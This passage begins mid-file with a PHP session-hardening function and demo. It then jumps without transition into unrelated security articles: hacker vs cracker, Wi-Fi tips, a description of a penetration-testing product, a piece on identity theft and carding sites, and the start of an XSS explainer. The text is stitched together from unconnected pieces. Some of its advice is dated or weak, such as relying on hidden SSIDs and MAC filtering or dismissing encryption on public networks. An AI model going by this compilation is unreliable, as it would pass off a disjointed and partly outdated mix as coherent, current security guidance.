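    ini_set('session.use_strict_mode', '1');

    session_set_cookie_params([
        'lifetime' => 0,       // non-persistent: dropped when the browser closes
        'path'     => '/',
        'secure'   => true,    // only sent over SSL/TLS, never in the clear
        'httponly' => true,    // not readable by injected script (XSS)
        'samesite' => 'Lax',
    ]);
    session_start();           // PHP 7.1+ draws the ID from a CSPRNG

    // Destroy the session state after a period of inactivity.
    $now = time();
    $last = $_SESSION['last_seen'] ?? $now;
    if ($now - $last > IDLE_LIMIT_SECONDS) {
        $_SESSION = [];               // drop the stale user's data
        session_regenerate_id(true);  // and retire the old ID
    }
    $_SESSION['last_seen'] = $now;
}

function on_login(string $user_id): void
{
    // Issue a fresh ID at login so any ID seen before authentication is useless.
    session_regenerate_id(true);
    $_SESSION['user_id'] = $user_id;
    $_SESSION['last_seen'] = time();
}

function on_logout(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    // Expire the cookie in the browser as well as the data on the server.
    setcookie(session_name(), '', [
        'expires'  => time() - 3600,
        'path'     => $p['path'],
        'domain'   => $p['domain'],
        'secure'   => $p['secure'],
        'httponly' => $p['httponly'],
        'samesite' => $p['samesite'],
    ]);
    session_destroy();
}

// Demonstration with a constructed user ID.
start_hardened_session();
$before = session_id();
on_login('user-1001');
echo $before !== session_id() ? "ID rotated at login\n" : "ID unchanged\n";
```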


Difference between a Hacker and a cracker

When most people think about computer security the word hacker comes to their mind. Another word that is also associated with bad computer behaviour is cracker and most of the time the two words are used interchangeably but they are not the same thing.


A hacker is a person who has a great deal of computing skill and enjoys the challenge of solving technical issues. This includes breaking into and infiltrating computers and networks. The aim of hackers is not to cause damage; rather, the technical aspects and how to overcome them fascinate them, and they see it as learning and as a status symbol within the hacker community.

An individual does not give himself the title hacker but it is left up to the community to bestow that title if the person has demonstrated the required knowledge and proved it. A hacker feels that information should be free so they document how they went about overcoming certain difficulties so others can learn from them. This sharing raises the status of the individual concerned and as a whole the community benefits.

Unlike a hacker the aim of a cracker is to cause mischief and gain some benefit by causing harm to the owner of the computer or network broken into e.g. by stealing credit card details or installing some malicious software.

Hackers see crackers as lowlifes and try very hard to distinguish themselves from them but this is not easy especially when the media insists on calling everybody a hacker.

The difference between a hacker and a cracker might not seem a lot to the average person because, after all, both of them break into computers and networks without authorisation, but in reality there is a big difference, because what matters is what the person does after he/she infiltrates a network.


Top Wi-Fi security tips


Use a strong password. As I pointed out in the article A little more about passwords, a sufficiently strong password (on a system with decent password protection) makes the likelihood of cracking the password through brute force attacks effectively impossible. Using a sufficiently weak password, on the other hand, almost guarantees that your system will be compromised at some point.

Don’t broadcast your SSID. Serious security crackers who know what they are doing will not be deterred by a hidden SSID — the “name” you give your wireless network. Configuring your wireless router so it doesn’t broadcast your SSID does not provide “real” security, but it does help play the “low hanging fruit” game pretty well. A lot of lower-tier security crackers and mobile malicious code like botnet worms will scan for easily discovered information about networks and computers, and attack those that have characteristics that make them appear easy to compromise. One of those is a broadcast SSID, and you can cut down on the amount of traffic your network gets from people trying to exploit vulnerabilities on random networks by hiding your SSID. Most commercial grade router/firewall devices provide a setting for this.

Use good wireless encryption. WEP is not exactly “good” encryption. With a freely available tool like aircrack, you can sniff wireless traffic protected by WEP and crack security on that network in a matter of minutes. WPA is the current, common encryption standard you should probably be using — though, of course, you should use something stronger as soon as it becomes available to you. Technology is advancing every day, on both sides of the encryption arms race, after all.

Use another layer of encryption when possible. Don’t just rely on wireless encryption to provide all your security on wireless networks. Other forms of encryption can improve the security of the systems on the network, even if someone happens to gain access to the network itself. For instance, OpenSSH is an excellent choice for providing secure communications between computers on the same network, as well as across the Internet. Using encryption to protect your wireless network does not protect any communications that leave the network, so encryption schemes like SSL for dealing with e-commerce Websites is still of critical importance. The fact you’re using one type of encryption in no way suggests you should not be using other types of encryption as well.

Restrict access by MAC address. Many will tell you that MAC address restriction doesn’t provide real protection but, like hiding your wireless network’s SSID, restricting the MAC addresses allowed to connect to the network helps ensure you are not one of the “low hanging fruits” that people prefer to attack. It is best to be effectively invulnerable to the expert security cracker, but there’s nothing wrong with being less palatable to the amateur as well.

Shut down the network when it’s not being used. This bit of advice is even more dependent on specific circumstances than most of them. If you have the sort of network that does not need to be running twenty-four hours a day, seven days a week, you can reduce the availability of it to security crackers by turning it off when it isn’t in use. While many of us run networks that never sleep, and cannot really put this suggestion into practice, it is worth mentioning if only because one of the greatest improvements to the security of a system you will ever encounter is to simply turn it off. Nobody can access what isn’t there.

Shut down your wireless network interface, too. If you have a mobile device such as a laptop that you carry around with you and use in public, you should have the wireless network interface turned off by default. Only turn it on when you actually need to connect to a wireless network. The rest of the time, an active wireless network interface is nothing more than another attack vector for malicious security crackers to use as a target.

Monitor your network for intruders. You should always make sure you have an eye on what’s going on, that you are tracking attack trends. The more you know about what malicious security crackers are trying to do to your network, the better the job of defending against them you can do. Collect logs on scans and access attempts, use any of the hundreds of statistics generating tools that exist to turn those logs into more useful information, and set up your logging server to email you when something really anomalous happens. As a certain cartoon military SpecOps team from the 1980s would tell you, knowing about the danger is half the battle.

Cover the bases. Make sure you have some kind of good firewall running, whether on a wireless router or on a laptop you use to connect to wireless networks away from home. Make sure you turn off unneeded services, especially on MS Windows where the unneeded services that are active by default might surprise you. In fact, do everything you can to secure your system regardless of OS platform, mobility of the system, or type of network.

Don’t waste your time on ineffective security measures. Every now and then, I run across some technically deficient end user handing out free advice about security based on things overheard and half-understood. Generally, this advice is merely useless, though often enough it can be downright harmful. The single most common bit of bad advice I hear from such people with regard to wireless networking is the admonition that when connecting to a public wireless network, such as in a coffee shop, you should only connect if the network uses wireless encryption. Sometimes these people get the advice half right, and recommend only connecting to networks protected by WPA — it’s half right only because WPA is the wireless encryption you should use, if you are going to use wireless encryption at all. There is no point in trying to “protect” yourself by connecting to a public access point only if it uses encryption, however, because the fact that the encryption key will be handed out to anyone that asks for it completely obviates the supposed protection you expect. It’s a bit like locking the front door of the house, but leaving a big sign on the door that says “The key is under the welcome mat,” which only protects against illiterate burglars. If you want your network to be available to everyone that walks onto the premises, just leave it unencrypted, and if you need to connect to the Internet in some public location, don’t worry about encryption. In fact, if anything, the wireless encryption might more properly serve as a deterrent rather than an enticement to using that particular wireless network, because it reduces convenience without effectively improving security at all.

Most of the security tips one can offer about wireless networking are the sort of thing someone might call “common sense”. Unfortunately, there’s an awful lot of “common sense” floating around out there, and it’s not easy to keep it all in mind all the time. You should always check up on your wireless networks and mobile computers regularly to make sure you aren’t missing something important, and you should always double-check your assumptions to make sure you aren’t wasting your energy on something not only unnecessary, but entirely useless, when more effective security measures could use your attention.

How CORE IMPACT Pro Penetration Testing Works

The CORE IMPACT Pro Rapid Penetration Testing (RPT) methodology streamlines testing of servers, desktop systems, end-user systems, web applications, wireless networks, and network devices by automating tasks that would traditionally require significant time, effort and expertise to perform.

The RPT automates the accepted best practice for performing penetration tests through six key steps:



IMPACT provides integrated Rapid Penetration Testing capabilities across five attack categories

Network Rapid Penetration Testing: replicates the actions of an attacker launching remote exploits on your network
Client-Side Rapid Penetration Testing: replicates phishing, spear phishing, spam and other social engineering attacks against end users
Web Application Rapid Penetration Testing: replicates SQL injection and remote file inclusion attacks against e-commerce, customer self-service, ERP and other web applications
Wireless Network Rapid Penetration Testing: replicates attempts at discovering Wi-Fi access points, cracking encryption keys, and joining exposed networks
Network Device Penetration Testing: replicates attempts to access networks and intercept data by detecting and exploiting network router and switch vulnerabilities
The five test approaches differ in the Information Gathering and Attack and Penetration stages, as outlined below. The remaining steps of the Rapid Penetration Test are the same once network access is achieved.

Each step is automated using easy-to-use wizards that simplify testing for new users and allow advanced users to efficiently execute common tasks. Advanced users can also manually run specific product modules to further customize the penetration testing process.


What is identity theft?

1. Over 50 of the reported information breaches from the last year have been attributed to computer hacking.

2. Hacking accounted for the largest number of compromised personal records in the last 12 months, involving an estimated 43 million Americans.

3. Well-known brands which have lost data through computer hacking in the past 18 months include DSW Shoes, Polo Ralph Lauren, and BJ's Wholesale.

What happens to stolen credit card and Social Security numbers?

Much of the data stolen through computer hacking, including stolen credit card numbers and Social Security numbers, will end up on a network of illegal trading websites where hackers and criminals from around the world openly buy and sell large quantities of personal information for profit.

Stolen data networks have flourished in the open, with names like Community Terrorism Forum, Shadowcrew, Carderplanet, Dark Profits, and Mazafaka. The Shadowcrew network was believed to have over 4,000 active users who made over $5 million in less than two years trading 1.5 million stolen credit cards, before it was shut down.

A typical credit card hacking transaction on one of these sites might take place as follows:

1. Stolen credit card numbers and other personal information are posted for sale, either to be purchased or used in a "joint venture."

2. In a joint venture, other network users will use stolen numbers to buy goods and send them to a drop site for pick-up by other users. The goods are then sold and the proceeds shared among the participants.

3. New or unproven sellers on the credit card hacking network are typically required to prove their credibility by participating in a number of dummy runs to test that both the seller and the stolen cards are genuine.

Some credit card hacking sites also include a rating system, where users can post feedback on the quality of stolen credit card numbers and other information offered for sale by members. Many of these computer identity theft sites will accept requests for particular kinds of stolen information and will also sell complete phishing sites and email templates so that even absolute beginners can easily run phishing scams with little technical knowledge.

There has also been a shift in the professional computer hacking community, in which hackers who used to do it for the thrill or the fame are now doing it for profit. In the words of one hacker, "In the old days of hacking it was a bit like base-jumping the Chrysler building. All you got was a slap on the wrist and a front page headline."

But now hackers are facing serious jail time for even the smallest hack, and they want to make hacking worth the risk. In most cases, all they do is find the opening, commit identity theft, and then sell the stolen credit card numbers; or they just locate the credit card hacking opportunity and sell that information for others to do the stealing.

Another source of computer identity theft involves former employees hacking into the networks and computers of their old job, using either insider knowledge or password accounts that were never cancelled. For example, the thief who stole 30,000 credit records from his employer in New York committed the crime over a two-year period after he left the company. The cost of his crime was estimated at more than $100 million.

He simply used his insider knowledge and a password that someone forgot to cancel. And if employees are disgruntled or angry after they leave the company, perhaps because they were fired, they may justify their actions by convincing themselves it's "just compensation" for money they should have been paid.

Opportunist hackers also continue to be a problem. These are amateurs and professionals who spend hours a day running random port scans across the Internet looking for unprotected home computers. When they find one, they'll usually just poke around inside the network or computer to see what's worth taking, and these days they know that any personal or customer information on that computer will be of value to someone somewhere.

And with nearly 4,000 hacking sites on the web, any petty criminal can now learn how to become an accomplished hacker free of charge, and possibly earn a much better living for a lot less risk. The criminals who used to lurk in doorways armed with a crowbar now lurk in front of laptops armed with a chai latte. These guys know that it is much easier to break into a business through the Internet to commit identity theft than through a skylight, and there's no chance of being bitten by the owner's Doberman.

Small businesses' computer systems are particularly vulnerable to identity theft, because they usually offer easy and unguarded access to things like customer credit card records and employee payroll files. Most small businesses don't use or keep access logs, so even if their data has been stolen, they probably won't even know it.

How Computer Hacking Happens

Hacking attacks can be launched in a number of ways:

1. Attacking computers that don't have firewalls installed.

2. Installing keystroke loggers or other malicious code by hiding it in email attachments.

3. Exploiting browser vulnerabilities that have not been properly patched.

4. Exploiting weak or poorly protected passwords.

5. Hiding malicious code in downloads or free software.

6. Hiding malicious code in images on websites and waiting for unsuspecting users to click on them.

7. Employees or other trusted users simply accessing an unprotected computer.

8. Exploiting poorly installed networks, especially wireless home networks.

So What Can You Do About Computer Hacking?

1. Make sure all computers you use in your home or business have the latest firewalls and anti-virus software installed.

2. Keep up to date with the latest patches, especially for your browser.

3. Use a good-quality anti-spyware solution, and scan your computers regularly for any pests.

4. Be careful about the types of websites you visit, what you click on, and what you download. And make sure that everyone who uses your computer understands the security risks and rules.

5. Scrutinize suspicious emails that may actually be phishing scams.

Visit the Privacy Matters IdentitySM Learning Center for news feeds about the latest security breaches, scams and other identity theft threats.

What is Cross site Scripting (XSS)?

Cross site scripting (also known as XSS) occurs when a web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink which contains malicious content within it. The user will most likely click on this link from another website, an instant message, or while simply reading a web board or email message. Usually the attacker will encode the malicious portion of the link to the site in HEX (or other encoding methods) so the request looks less suspicious to the user when clicked on. After the data is collected by the web application, it creates an output page for the user containing the malicious data that was originally sent to it, but in a manner that makes it appear as valid content from the website. Many popular guestbook and forum programs allow users to submit posts with HTML and JavaScript embedded in them. If, for example, I was logged in as "john" and read a message by "joe" that contained malicious JavaScript in it, then it may be possible for "joe" to hijack my session just by my reading his bulletin board post.